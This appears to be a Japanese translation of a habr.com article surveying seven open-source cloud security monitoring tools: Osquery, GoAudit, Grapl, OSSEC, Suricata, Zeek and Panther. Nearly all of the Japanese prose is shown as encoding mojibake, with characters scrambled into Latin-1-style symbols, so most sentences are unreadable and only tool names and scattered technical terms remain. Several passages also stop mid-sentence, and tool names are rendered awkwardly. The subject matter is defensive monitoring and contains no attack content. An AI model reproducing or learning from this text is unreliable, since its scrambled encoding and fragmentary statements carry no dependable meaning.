ã¯ã©ãŠã ã³ã³ãã¥ãŒãã£ã³ã°ã®æ®åã¯ãäŒæ¥ã®ããžãã¹ã®æ¡å€§ã«åœ¹ç«ã¡ãŸãã ããããæ°ãããã©ãããã©ãŒã ã®äœ¿çšã¯ãæ°ããªè åšã®åºçŸãæå³ããŸãã ã¯ã©ãŠã ãµãŒãã¹ã®ã»ãã¥ãªãã£ã®ç£èŠãæ åœããçµç¹å ã§èªåã®ããŒã ããµããŒãããã®ã¯ç°¡åãªäœæ¥ã§ã¯ãããŸããã æ¢åã®ç£èŠããŒã«ã¯é«äŸ¡ã§æéãããããŸãã 倧èŠæš¡ãªã¯ã©ãŠã ã€ã³ãã©ã¹ãã©ã¯ãã£ã®ã»ãã¥ãªãã£ã確ä¿ããå¿ èŠãããå Žåããããã管çããã®ã¯ããçšåºŠå°é£ã§ãã ã¯ã©ãŠãã®ã»ãã¥ãªãã£ãé«ãã¬ãã«ã«ç¶æããããšèããŠããäŒæ¥ã¯ããããŸã§å©çšã§ãããã®ãè¶ ããŠåŒ·åã§æè»æ§ããããç解ããããããŒã«ãå¿ èŠãšããŠããŸãã ããã§ããªãŒãã³ãœãŒã¹ ãã¯ãããžãŒãéåžžã«åœ¹ç«ã¡ãŸãããªãŒãã³ãœãŒã¹ ãã¯ãããžãŒã¯ãã»ãã¥ãªãã£äºç®ã®ç¯çŽã«åœ¹ç«ã¡ãããžãã¹ã«ç²Ÿéããå°é家ã«ãã£ãŠäœæãããŸãã
æ¬æ¥ãã®ç¿»èš³ãå
¬éãããã®èšäºã§ã¯ãã¯ã©ãŠã ã·ã¹ãã ã®ã»ãã¥ãªãã£ãç£èŠããããã® 7 ã€ã®ãªãŒãã³ãœãŒã¹ ããŒã«ã®æŠèŠã説æããŠããŸãã ãããã®ããŒã«ã¯ãç°åžžãå±éºãªã¢ã¯ãã£ããã£ãæ€åºããããšã§ããã«ãŒããµã€ããŒç¯çœªè
ããä¿è·ããããã«èšèšãããŠããŸãã
1.ãªã¹ã¯ãšãª
Osquery ãã¬ãŒã ã¯ãŒã¯ã¯ Facebook ã«ãã£ãŠäœæãããŸããã ãªãã¬ãŒãã£ã³ã° ã·ã¹ãã ã®äœã¬ãã«ã®ã¡ã«ããºã ãç£èŠããããŒã«ãå¿
èŠãªã®ã¯èªç€Ÿã ãã§ã¯ãªãããšã«å瀟ãæ°ã¥ããåŸããã®ã³ãŒã㯠2014 幎ã«å
¬éãããŸããã ãã以æ¥ãOsquery ã¯ãDactivãGoogleãKolideãTrail of BitsãUptycs ãªã©ã®äŒæ¥ã®å°é家ã«ãã£ãŠäœ¿çšãããŠããŸãã æè¿ã¯ããã§ãã
osqueryd ãšåŒã°ãã Osquery ã®ãã¹ãç£èŠããŒã¢ã³ã䜿çšãããšãçµç¹ã®ã€ã³ãã©ã¹ãã©ã¯ãã£å
šäœããããŒã¿ãåéããã¯ãšãªãã¹ã±ãžã¥ãŒã«ã§ããŸãã ããŒã¢ã³ã¯ã¯ãšãªçµæãåéããã€ã³ãã©ã¹ãã©ã¯ãã£ã®ç¶æ
ã®å€åãåæ ãããã°ãäœæããŸãã ããã¯ãã»ãã¥ãªãã£å°é家ãã·ã¹ãã å
ã®ç¶æ³ãåžžã«ææ¡ããã®ã«åœ¹ç«ã¡ãç¹ã«ç°åžžã®æ€åºã«åœ¹ç«ã¡ãŸãã Osquery ã®ãã°éçŽæ©èœã䜿çšãããšãæ¢ç¥ããã³æªç¥ã®ãã«ãŠã§ã¢ã®æ€çŽ¢ã容æã«ããã ãã§ãªãã䟵å
¥è
ãã·ã¹ãã ã«äŸµå
¥ããå Žæãç¹å®ãã䟵å
¥è
ãã€ã³ã¹ããŒã«ããããã°ã©ã ãèŠã€ããããšãã§ããŸãã
2.ãŽãŒç£æ»
ã·ã¹ãã
GoAudit ã·ã¹ãã 㯠Golang ã§æžãããŠããŸãã ããã¯ã¿ã€ãã»ãŒãã§é«æ§èœãªèšèªã§ãã GoAudit ãã€ã³ã¹ããŒã«ããåã«ãGolang ã®ããŒãžã§ã³ã 1.7 以éã§ããããšã確èªããŠãã ããã
3 ã°ã©ããã«
ãããžã§ã¯ã
Grapl ããŒã«ã¯ãã»ãã¥ãªãã£é¢é£ã®ãã° (Sysmon ãã°ãŸãã¯ãã¬ãŒã³ãª JSON ãã°) ãååŸãããããããµãã°ã©ã (åããŒãã®ãID æ å ±ããå®çŸ©) ã«å€æããŸãã ãã®åŸããµãã°ã©ããçµåããŠãåæãããç°å¢ã§å®è¡ãããã¢ã¯ã·ã§ã³ãè¡šãäžè¬çãªã°ã©ã (ãã¹ã¿ãŒ ã°ã©ã) ãäœæããŸãã 次ã«ãGrapl ã¯ããæ»æè ã®ã·ã°ããã£ãã䜿çšããŠçµæã®ã°ã©ãã«å¯ŸããŠã¢ãã©ã€ã¶ãŒãå®è¡ããç°åžžãçããããã¿ãŒã³ãæ€åºããŸãã ããŒãµãŒãçããããµãã°ã©ããæ€åºãããšãGrapl ã¯èª¿æ»ã®ããã« Engagement æ§é ãçæããŸãã Engagement ã¯ãAWS ç°å¢ã«ãããã€ããã Jupyter Notebook ãªã©ã«ããŒãã§ãã Python ã¯ã©ã¹ã§ãã Grapl ã¯ãã°ã©ããæ¡åŒµããããšã§ãã€ã³ã·ãã³ã調æ»ã®ããã®æ å ±åéãã¹ã±ãŒã«ã¢ããããããšãã§ããŸãã
Grapl ããã£ãšäœ¿ãããªãããå Žåã¯ã次ã®ãªã³ã¯ãåç
§ããŠãã ããã
4 OSSEC
OSSEC ã¯ããã¹ãããŒã¹ã®äŸµå ¥æ€ç¥ã·ã¹ãã (HIDS) ãšã»ãã¥ãªã㣠ã€ã³ã·ãã³ã管ç (SIM) ããã³ã»ãã¥ãªãã£æ å ±ããã³ã€ãã³ã管ç (SIEM) ãçµã¿åãããŸãã OSSEC ã¯ããã¡ã€ã«ã®æŽåæ§ããªã¢ã«ã¿ã€ã ã§ç£èŠããããšãã§ããŸãã ããã¯ãããšãã°ãWindows ã¬ãžã¹ããªã®ç£èŠãã«ãŒããããã®æ€åºãªã©ã§ãã OSSEC ã¯ãæ€åºãããåé¡ã«ã€ããŠé¢ä¿è ã«ãªã¢ã«ã¿ã€ã ã§éç¥ããããšãã§ããæ€åºãããè åšã«è¿ éã«å¯Ÿå¿ããã®ã«åœ¹ç«ã¡ãŸãã ãã®ãã©ãããã©ãŒã ã¯ãMicrosoft Windows ãšãLinuxãFreeBSDãOpenBSDãSolaris ãªã©ã®ææ°ã® Unix ç³»ã·ã¹ãã ããµããŒãããŸãã
OSSEC ãã©ãããã©ãŒã ã¯ãäžå€®å¶åŸ¡ãšã³ãã£ãã£ããšãŒãžã§ã³ã (ç£èŠå¯Ÿè±¡ã®ã·ã¹ãã ã«ã€ã³ã¹ããŒã«ãããŠããå°ããªããã°ã©ã ) ããã®æ å ±ãåä¿¡ããŠââç£èŠããããã«äœ¿çšããããããŒãžã£ãŒã§æ§æãããŸãã ãããŒãžã£ãŒã¯ããã¡ã€ã«ã®æŽåæ§ããã§ãã¯ããããã«äœ¿çšãããããŒã¿ããŒã¹ãä¿æãã Linux ã·ã¹ãã ã«ã€ã³ã¹ããŒã«ãããŸãã ãŸããã€ãã³ããã·ã¹ãã ç£æ»çµæã®ãã°ãšèšé²ãä¿æããŸãã
OSSEC ãããžã§ã¯ãã¯çŸåšãAtomicorp ã«ãã£ãŠãµããŒããããŠããŸãã å瀟ã¯ç¡æã®ãªãŒãã³ãœãŒã¹ ããŒãžã§ã³ãå³éžããããã«ã
5. ããŒã¢ãã£ãã
ãã®ååã¯2009幎ã«çºå£²ãããŸããã 圌ã®ä»äºã¯ã«ãŒã«ã«åºã¥ããŠããŸãã ã€ãŸããããã䜿çšãã人ã¯ããããã¯ãŒã¯ ãã©ãã£ãã¯ã®ç¹å®ã®ç¹åŸŽã説æããæ©äŒããããŸãã ã«ãŒã«ãããªã¬ãŒããããšãSuricata ã¯éç¥ãçæããäžå¯©ãªæ¥ç¶ããããã¯ãŸãã¯åæããŸããããããèšå®ãããã«ãŒã«ã«ãã£ãŠç°ãªããŸãã ãã®ãããžã§ã¯ãã¯ãã«ãã¹ã¬ããããµããŒãããŠããŸãã ããã«ããã倧éã®ãã©ãã£ãã¯ãäŒéãããããã¯ãŒã¯ã§å€æ°ã®ã«ãŒã«ãè¿ éã«åŠçã§ããããã«ãªããŸãã ãã«ãã¹ã¬ããã®ãµããŒãã®ãããã§ãããæ®éã®ãµãŒããŒã¯ 10 Gb/s ã®é床ã§ãã©ãã£ãã¯ãæ£åžžã«åæã§ããŸãã åæã«ã管çè ã¯ãã©ãã£ãã¯åæã«äœ¿çšããã«ãŒã«ã®ã»ãããå¶éããå¿ èŠããããŸããã Suricata ã¯ãã¡ã€ã«ã®ããã·ã¥åãšæœåºããµããŒãããŠããŸãã
Suricata ã¯ã補åã«æè¿è¿œå ãããæ©èœã䜿çšããŠãéåžžã®ãµãŒããŒãŸã㯠AWS ãªã©ã®ä»®æ³ãã·ã³äžã§å®è¡ããããã«æ§æã§ããŸãã
ãã®ãããžã§ã¯ãã¯ãè€éã§è©³çŽ°ãªè åšã·ã°ããã£åæããžãã¯ã®äœæã«äœ¿çšã§ãã Lua ã¹ã¯ãªããããµããŒãããŠããŸãã
Suricata ãããžã§ã¯ãã¯ãOpen Information Security Foundation (OISF) ã«ãã£ãŠç®¡çãããŠããŸãã
6. ãžãŒã¯ (å )
ã¹ãªã«ã¿ã®ããã«ã
Zeek ããããã¯ãŒã¯ ã»ãã¥ãªã㣠ããŒã«ãšèãããšãã¹ãã·ã£ãªã¹ãã¯ã€ã³ã·ãã³ãã®åãŸãã¯æäžã«äœãèµ·ãã£ãããç¥ãããšã§ãã€ã³ã·ãã³ãã調æ»ããæ©äŒãåŸããããšèšããŸãã ãŸããZeek ã¯ãããã¯ãŒã¯ ãã©ãã£ã㯠ããŒã¿ãé«ã¬ãã«ã®ã€ãã³ãã«å€æããã¹ã¯ãªãã ã€ã³ã¿ããªã¿ãšé£æºã§ããããã«ããŸãã ã€ã³ã¿ããªã¿ã¯ãã€ãã³ããšå¯Ÿè©±ãããããã¯ãŒã¯ ã»ãã¥ãªãã£ã®èŠ³ç¹ãããããã®ã€ãã³ããäœãæå³ããããæ£ç¢ºã«èª¿ã¹ãããã«äœ¿çšãããããã°ã©ãã³ã°èšèªããµããŒãããŸãã Zeek ããã°ã©ãã³ã°èšèªã䜿çšãããšãç¹å®ã®çµç¹ã®å¿ èŠã«å¿ããŠã¡ã¿ããŒã¿ã®è§£éãã«ã¹ã¿ãã€ãºã§ããŸãã ANDãORãNOT æŒç®åã䜿çšããŠè€éãªè«çæ¡ä»¶ãæ§ç¯ã§ããŸãã ããã«ããããŠãŒã¶ãŒã¯ç°å¢ã®åææ¹æ³ãã«ã¹ã¿ãã€ãºã§ããããã«ãªããŸãã 確ãã«ãSuricata ãšæ¯èŒãããšãã»ãã¥ãªãã£è åšã«é¢ããã€ã³ããªãžã§ã³ã¹ãå®æœããå ŽåãZeek ã¯ããªãè€éãªããŒã«ã®ããã«èŠããå Žåãããããšã«æ³šæããå¿ èŠããããŸãã
Zeek ã«ã€ããŠããã«è©³ããç¥ãããå Žåã¯ããåãåãããã ããã
7.ãã³ãµãŒ
Panther ã®äž»ãªæ©èœã¯æ¬¡ã®ãšããã§ãã
- ãã°åæã«ãããªãœãŒã¹ãžã®äžæ£ã¢ã¯ã»ã¹ãæ€ç¥ã
- è åšã¹ãã£ã³ã¯ãã»ãã¥ãªãã£åé¡ã瀺ãã€ã³ãžã±ãŒã¿ãŒã®ãã°ãæ€çŽ¢ããããšã«ãã£ãŠå®è£ ãããŸãã æ€çŽ¢ã¯ãæšæºåããã Panter ããŒã¿ ãã£ãŒã«ãã䜿çšããŠå®è¡ãããŸãã
- SOC/PCI/HIPAA æºæ ã®ã·ã¹ãã ãã§ãã¯ã䜿çšããŠ
åã蟌㿠ãã³ãµãŒã®ã¡ã«ããºã ã - æªçšããããšé倧ãªåé¡ãåŒãèµ·ããå¯èœæ§ãããæ§æãšã©ãŒãèªåçã«ä¿®æ£ããããšã§ãã¯ã©ãŠã ãªãœãŒã¹ãä¿è·ããŸãã
Panther ã¯ãAWS CloudFormation ã䜿çšããŠçµç¹ã® AWS ã¯ã©ãŠãã«ãããã€ãããŸãã ããã«ããããŠãŒã¶ãŒã¯èªåã®ããŒã¿ãåžžã«ç®¡çã§ããããã«ãªããŸãã
çµæ
æè¿ã§ã¯ãã·ã¹ãã ã®ã»ãã¥ãªãã£ãç£èŠããããšãæãéèŠãªã¿ã¹ã¯ã«ãªã£ãŠããŸãã ãªãŒãã³ãœãŒã¹ ããŒã«ã¯ãããããèŠæš¡ã®äŒæ¥ããã®åé¡ã解決ããã®ã«åœ¹ç«ã¡ãè²»çšãç¡æãã»ãšãã©ãªããå€ãã®æ©äŒãæäŸããŸãã
芪æãªãèªè ïŒ ã©ã®ãããªã»ãã¥ãªãã£ç£èŠããŒã«ã䜿çšããŠããŸãã?
åºæïŒ habr.com